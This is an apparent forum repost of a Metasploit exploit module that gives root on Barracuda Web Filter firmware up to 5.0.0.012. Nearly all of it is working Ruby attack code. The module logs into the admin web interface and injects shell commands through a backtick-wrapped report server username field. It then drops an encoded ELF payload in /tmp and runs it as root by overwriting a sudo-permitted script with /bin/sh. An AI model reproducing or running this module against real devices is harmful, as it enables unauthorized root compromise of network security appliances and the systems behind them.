Barracuda Firmware 5.0.0.012 Post-Auth Remote Root

[KhiZaRix]

# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit

# Exploit Author: xort

# Vendor Homepage: https://www.barracuda.com/

# Software Link: https://www.barracuda.com/products/webfilter

# Version: Firmware <= 5.0.0.012

# Tested on: Vx and Hardware platforms

#

# Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating

# capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain

# root. xort@blacksecurity.org

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Exploit::Remote::Tcp

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root',

'Description' => %q{

This module exploits a remote command execution vulnerability in

the Barracuda Firmware Version <= 5.0.0.012 by exploiting a

vulnerability in the web administration interface.

By sending a specially crafted request it's possible to inject system

commands while escalating to root do to relaxed sudo configuration on the local

machine.

},

'Author' =>

[

'xort', # metasploit module

],

'Version' => '$Revision: 12345 $',

'References' =>

[

[ 'none', 'none'],

],

'Platform' => [ 'linux'],

'Privileged' => true,

'Arch' => [ ARCH_X86 ],

'SessionTypes' => [ 'shell' ],

'Privileged' => false,

'Payload' =>

{ # note: meterpreter can't run on host do to kernel 2.4 incompatibilities + this is stable

'Compat' =>

{

'ConnectionType' => 'find',

}

},

'Targets' =>

[

['Linux Universal',

{

'Arch' => ARCH_X86,

'Platform' => 'linux'

}

],

],

'DefaultTarget' => 0))

register_options(

[

OptString.new('PASSWORD', [ false, 'Device password', "" ]),

OptString.new('ET', [ false, 'Device password', "" ]),

OptString.new('USERNAME', [ true, 'Device password', "admin" ]),

OptString.new('CMD', [ false, 'Command to execute', "" ]),

Opt::RPORT(8000),

], self.class)

end

def do_login(username, password, et)

vprint_status( "Logging into machine with credentials...\n" )

# timeout

timeout = 1550;

# params

password_clear = "admin"

real_user = "";

login_state = "out"

enc_key = Rex::Text.rand_text_hex(32)

et = "1358817515"

locale = "en_US"

user = username

password = Digest::MD5.hexdigest(username+enc_key)

enctype = "MD5"

password_entry = ""

vprint_status( "Starting first routine...\n" )

data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login"

vprint_status( "#{data}\n" )

res = send_request_cgi(

{

'method' => 'POST',

'uri' => "/cgi-mod/index.cgi",

'cookie' => "",

'data' => data

}, timeout)

vprint_status( "login got code: #{res.code} ... continuing to second request..." )

File.open("/tmp/output2", 'w+') {|f| f.write(res.body) }

# get rid of first yank

password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result

et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0]

vprint_status( "password got back = #{password} - et got back = #{et}\n" )

return password, et

end

def run_command(username, password, et, cmd)

vprint_status( "Running Command...\n" )

exploitreq = [

[ "primary_tab", "BASIC" ],

[ "secondary_tab","reports" ],

[ "realm","" ],

[ "auth_type","Local" ],

[ "user", username ],

[ "password", password ],

[ "et",et ],

[ "role","" ],

[ "locale","en_US" ],

[ "q","" ],

[ "UPDATE_new_report_time_frame","custom" ],

[ "report_start","2013-01-25 01:14" ],

[ "report_end","2013-01-25 02:14" ],

[ "type","" ],

[ "ntlm_server","" ],

[ "kerb_server","" ],

[ "local_group","changeme" ],

[ "ip_group","20.20.108.0/0.0.0.0" ],

[ "ip_address__0","" ],

[ "ip_address__1","" ],

[ "ip_address__2","" ],

[ "ip_address__3","" ],

[ "netmask__0","" ],

[ "netmask__1","" ],

[ "netmask__2","" ],

[ "netmask__3","" ],

[ "UPDATE_new_report_pattern_values","" ],

[ "UPDATE_new_report_pattern_text","" ],

[ "UPDATE_new_report_filter_destination","domain" ],

[ "filter_domain","" ],

[ "UPDATE_new_report_filter_domain","" ],

[ "UPDATE_new_report_filter_category","" ],

[ "UPDATE_new_report_exclude_from","" ],

[ "UPDATE_new_report_exclude_to","" ],

[ "UPDATE_new_report_exclude_days","" ],

[ "allow","allow" ],

[ "block","block" ],

[ "warn","warn" ],

[ "monitor","monitor" ],

[ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ],

[ "UPDATE_new_report_filter_count","10" ],

[ "UPDATE_new_report_chart_type","vbar" ],

[ "UPDATE_new_report_format","html" ],

[ "DEFAULT_new_report_group_expand","No" ],

[ "UPDATE_new_report_expand_user_count","5" ],

[ "UPDATE_new_report_expand_domain_count","5" ],

[ "UPDATE_new_report_expand_cat_count","5" ],

[ "UPDATE_new_report_expand_url_count","5" ],

[ "UPDATE_new_report_expand_threat_count","5" ],

[ "report","on" ],

[ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ],

[ "UPDATE_new_report_id","" ],

[ "UPDATE_new_report_enabled","Yes" ],

[ "secondary_scope","report" ],

[ "secondary_scope_data","" ],

[ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ],

[ "UPDATE_new_report_delivery","external" ],

[ "UPDATE_new_report_delivery_dest_email","" ],

[ "UPDATE_new_report_server","new" ],

[ "UPDATE_new_external_server_type","smb" ],

[ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ],

[ "UPDATE_new_external_server","4.4.4.4" ],

[ "UPDATE_new_external_server_port","445" ],

[ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ],

[ "UPDATE_new_external_server_password","asdf" ],

[ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ],

[ "UPDATE_new_report_frequency", "once" ],

[ "UPDATE_new_report_split", "no" ],

[ "add_report_id","Apply" ],

[ "remover","" ]

]

data = Rex::MIME::Message.new

data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30)

exploitreq.each do |xreq|

data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"")

end

post_data = data.to_s

post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------")

datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"

vprint_status( "sending..." )

res = send_request_cgi({

'method' => 'POST',

'uri' => "/cgi-mod/index.cgi",

'ctype' => "multipart/form-data; boundary=#{data.bound}",

'data' => post_data,

'headers' =>

{

'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",

'Accept-Language' => "en-US,en;q=0.5"

}

})

if res.code == 200

vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" )

vprint_status( "password: #{password} et: #{et}\n" )

end

vprint_status( "login got code: #{res.code} from report_results.cgi\n" )

File.open("/tmp/output4", 'w+') {|f| f.write(res.body) }

end

def run_script(username, password, et, cmds)

vprint_status( "running script...\n")

end

def exploit

# timeout

timeout = 1550;

user = "admin"

# params

real_user = "";

login_state = "out"

et = "1358817515" #epoch time

locale = "en_US"

user = "admin"

password = ""

enctype = "MD5"

password_entry = ""

password_clear = "admin"

vprint_status("<- Encoding payload to elf string...")

elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)

encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly

if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?

password_clear = "admin"

password = datastore['PASSWORD']

et = datastore['ET']

# else - if no 'CMD' string - add code for root shell

else

password, et = do_login(user, password, et)

vprint_status("new password: #{password}\n")

end

sleep(5)

if not datastore['CMD'].nil? and not datastore['CMD'].empty?

cmd = datastore['CMD']

end

run_command(user, password, et, cmd)

# create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (static routes scripts), then execute with sudo perm

cmd = "echo -ne #{encoded_elf} > /tmp/x ;"

cmd += "chmod +x /tmp/x ;"

# backup static_routes file

cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz"

cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes"

# execute elf as root

cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;"

# restore static_routes file

cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes"

run_command(user, password, et, cmd)

sleep(2)

handler

sleep(5)

end

end

Source: http://packetstorm.wowhacker.com/1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt

Edited April 9, 2015 by KhiZaRix